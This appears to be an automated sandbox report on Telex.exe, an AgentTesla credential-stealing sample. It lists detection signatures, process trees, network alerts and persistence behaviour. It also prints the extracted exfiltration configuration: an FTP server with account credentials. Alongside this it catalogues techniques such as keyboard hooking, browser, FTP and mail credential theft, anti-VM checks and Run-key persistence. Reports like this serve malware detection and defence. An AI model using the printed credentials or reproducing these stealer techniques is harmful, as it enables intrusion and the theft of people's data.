Loading ...

Play interactive tourEdit tour

Analysis Report Telex.exe

Overview

General Information

Sample Name:Telex.exe
Analysis ID:412652
MD5:01fe9288b37bdeb3684db4bd497685e2
SHA1:083282559e805cef41f6c869d12bca814b72dcd6
SHA256:ec9c7eceabe73740fefb573d42bc06a3c7e65173f2c7c3030cbb50edd8e3ba17
Tags:AgentTeslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains very large array initializations
Contains functionality to register a low level keyboard hook
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • Telex.exe (PID: 6352 cmdline: 'C:\Users\user\Desktop\Telex.exe' MD5: 01FE9288B37BDEB3684DB4BD497685E2)
    • Telex.exe (PID: 6424 cmdline: C:\Users\user\Desktop\Telex.exe MD5: 01FE9288B37BDEB3684DB4BD497685E2)
  • mDPTQJF1.exe (PID: 4652 cmdline: 'C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe' MD5: 01FE9288B37BDEB3684DB4BD497685E2)
    • mDPTQJF1.exe (PID: 6100 cmdline: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe MD5: 01FE9288B37BDEB3684DB4BD497685E2)
    • mDPTQJF1.exe (PID: 4724 cmdline: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe MD5: 01FE9288B37BDEB3684DB4BD497685E2)
    • mDPTQJF1.exe (PID: 5920 cmdline: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe MD5: 01FE9288B37BDEB3684DB4BD497685E2)
  • mDPTQJF1.exe (PID: 852 cmdline: 'C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe' MD5: 01FE9288B37BDEB3684DB4BD497685E2)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "FTP Info": "ftp://ftp.universalinks.net/bring4@universalinks.net{lafa{u^wEx8"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 19 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            18.2.mDPTQJF1.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              18.2.mDPTQJF1.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                15.2.mDPTQJF1.exe.376ab38.3.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  15.2.mDPTQJF1.exe.376ab38.3.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    1.2.Telex.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 7 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmpMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Info": "ftp://ftp.universalinks.net/bring4@universalinks.net{lafa{u^wEx8"}
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: ftp.universalinks.netVirustotal: Detection: 10%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeReversingLabs: Detection: 25%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Telex.exeVirustotal: Detection: 26%Perma Link
                      Source: Telex.exeReversingLabs: Detection: 27%
                      Source: 18.2.mDPTQJF1.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 1.2.Telex.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: Telex.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: Telex.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.5:49728 -> 192.145.239.54:21
                      Source: TrafficSnort IDS: 2029928 ET TROJAN AgentTesla HTML System Info Report Exfil via FTP 192.168.2.5:49729 -> 192.145.239.54:31991
                      Source: Joe Sandbox ViewIP Address: 192.145.239.54 192.145.239.54
                      Source: Joe Sandbox ViewASN Name: IMH-WESTUS IMH-WESTUS
                      Source: unknownFTP traffic detected: 192.145.239.54:21 -> 192.168.2.5:49728 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed.220-Local time is now 11:46. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed.220-Local time is now 11:46. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed.220-Local time is now 11:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 300 allowed.220-Local time is now 11:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 30 minutes of inactivity.
                      Source: unknownDNS traffic detected: queries for: ftp.universalinks.net
                      Source: mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmpString found in binary or memory: ftp://ftp.universalinks.net/bring4
                      Source: Telex.exe, 00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmpString found in binary or memory: http://FvPNfC.com
                      Source: Telex.exe, 00000001.00000002.503353247.0000000002C70000.00000004.00000001.sdmpString found in binary or memory: http://ftp.universalinks.net
                      Source: Telex.exe, 00000000.00000002.238539164.0000000002861000.00000004.00000001.sdmp, Telex.exe, 00000001.00000002.503249049.0000000002C62000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321163435.00000000026B1000.00000004.00000001.sdmp, mDPTQJF1.exe, 00000014.00000002.327822019.0000000002FC1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Telex.exe, 00000001.00000002.502741768.0000000002BCA000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                      Source: mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: Telex.exe, 00000001.00000002.502771261.0000000002BCE000.00000004.00000001.sdmp, Telex.exe, 00000001.00000002.503249049.0000000002C62000.00000004.00000001.sdmpString found in binary or memory: https://srFPkrrHbWMI0Yhx6.net
                      Source: Telex.exe, 00000001.00000002.502771261.0000000002BCE000.00000004.00000001.sdmpString found in binary or memory: https://srFPkrrHbWMI0Yhx6.netX
                      Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                      Source: Telex.exe, 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmp, Telex.exe, 00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.322963471.00000000036B9000.00000004.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.496113093.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: Telex.exe, 00000001.00000002.502487076.0000000002B81000.00000004.00000001.sdmp, mDPTQJF1.exe, 00000012.00000002.501977027.00000000030C1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Contains functionality to register a low level keyboard hookShow sources
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 1_2_010EAD70 SetWindowsHookExW 0000000D,00000000,?,?
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\Desktop\Telex.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Telex.exe
                      Source: C:\Users\user\Desktop\Telex.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 1.2.Telex.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b6D16F24Au002d34D3u002d436Bu002dA9E5u002dCE5547824881u007d/u003596D1532u002dAAFEu002d4C3Fu002d9395u002d56D45A2D13D3.csLarge array initialization: .cctor: array initializer size 12079
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_00E9B14C
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_00E9C2B0
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_00E9B140
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_00E999D8
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_00E9DF71
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_02676948
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_02673A28
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_02673A38
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_02670040
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_0267405E
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_02670006
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_02673819
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_02673E00
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_02673E10
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_02673FF6
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_02673FAA
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 1_2_009D096C
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 1_2_009DDAB8
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 1_2_009D6BD0
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 1_2_010E4988
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 1_2_010E0040
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 1_2_010E6240
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 1_2_010ECC08
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 1_2_010E8F48
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 1_2_010E1ED8
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 1_2_010E0028
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 1_2_010E3D10
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 1_2_02A14940
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 1_2_02A1E160
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 1_2_02A14932
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_00BCC508
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_00BC99D8
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_024F6A68
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_024F0040
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_024F405E
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_024F0006
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_024F3A28
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_024F3A38
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_024F382A
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_024F3E00
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_024F3E10
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_024F3FF6
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_024F3FAA
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_04C07048
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_04C0DAB0
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_04C0B760
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_04C0B770
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_04C07039
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_00145C64
                      Source: Telex.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: mDPTQJF1.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: Telex.exe, 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamexNhKxszWtvJQEBMekJEP.exe4 vs Telex.exe
                      Source: Telex.exe, 00000000.00000002.239739509.0000000003869000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs Telex.exe
                      Source: Telex.exe, 00000000.00000002.238539164.0000000002861000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs Telex.exe
                      Source: Telex.exe, 00000000.00000000.229350759.0000000000500000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameInvalidFilterCriteriaException.exeP vs Telex.exe
                      Source: Telex.exe, 00000001.00000002.497491335.00000000008A0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameInvalidFilterCriteriaException.exeP vs Telex.exe
                      Source: Telex.exe, 00000001.00000002.500469927.0000000000FD0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Telex.exe
                      Source: Telex.exe, 00000001.00000002.496219146.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamexNhKxszWtvJQEBMekJEP.exe4 vs Telex.exe
                      Source: Telex.exe, 00000001.00000002.498218591.0000000000CF8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Telex.exe
                      Source: Telex.exe, 00000001.00000002.501300188.00000000010D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx vs Telex.exe
                      Source: Telex.exe, 00000001.00000002.501520800.0000000001170000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx.mui vs Telex.exe
                      Source: Telex.exeBinary or memory string: OriginalFilenameInvalidFilterCriteriaException.exeP vs Telex.exe
                      Source: Telex.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: Telex.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: mDPTQJF1.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 1.2.Telex.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 1.2.Telex.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/5@1/1
                      Source: C:\Users\user\Desktop\Telex.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Telex.exe.logJump to behavior
                      Source: Telex.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\Telex.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\Telex.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\Telex.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Telex.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Telex.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\Telex.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Telex.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
                      Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
                      Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
                      Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
                      Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                      Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                      Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                      Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
                      Source: Telex.exe, 00000000.00000002.238604586.00000000028A5000.00000004.00000001.sdmp, mDPTQJF1.exe, 0000000F.00000002.321251041.00000000026F5000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
                      Source: Telex.exeVirustotal: Detection: 26%
                      Source: Telex.exeReversingLabs: Detection: 27%
                      Source: Telex.exeString found in binary or memory: ^(Male|Female)$-Add Student Details :-
                      Source: Telex.exeString found in binary or memory: Teacher Name-Add Teacher Details :-
                      Source: C:\Users\user\Desktop\Telex.exeFile read: C:\Users\user\Desktop\Telex.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Telex.exe 'C:\Users\user\Desktop\Telex.exe'
                      Source: C:\Users\user\Desktop\Telex.exeProcess created: C:\Users\user\Desktop\Telex.exe C:\Users\user\Desktop\Telex.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe 'C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe'
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe 'C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe'
                      Source: C:\Users\user\Desktop\Telex.exeProcess created: C:\Users\user\Desktop\Telex.exe C:\Users\user\Desktop\Telex.exe
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeProcess created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exe
                      Source: C:\Users\user\Desktop\Telex.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: C:\Users\user\Desktop\Telex.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\Telex.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Telex.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Telex.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_00E94470 push edi; iretd
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_00E969D0 pushfd ; iretd
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_00E96988 pushfd ; iretd
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_00E96ADB push ss; ret
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_00E953D1 push esi; iretd
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_0267309C push edi; retf
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_026716CA pushfd ; iretd
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 0_2_026716D4 pushfd ; iretd
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 1_2_009DAD30 push 50009BC2h; iretd
                      Source: C:\Users\user\Desktop\Telex.exeCode function: 1_2_010E70A0 pushad ; retf
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_024F309C push edi; retf
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_024F16CA pushfd ; iretd
                      Source: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeCode function: 15_2_024F16D4 pushfd ; iretd
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.63584673594
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.63584673594
                      Source: C:\Users\user\Desktop\Telex.exeFile created: C:\Users\user\AppData\Roaming\mDPTQJF1\mDPTQJF1.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Telex.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mDPTQJF1Jump to behavior
                      Source: C:\Users\user\Desktop\Telex.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mDPTQJF1Jump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
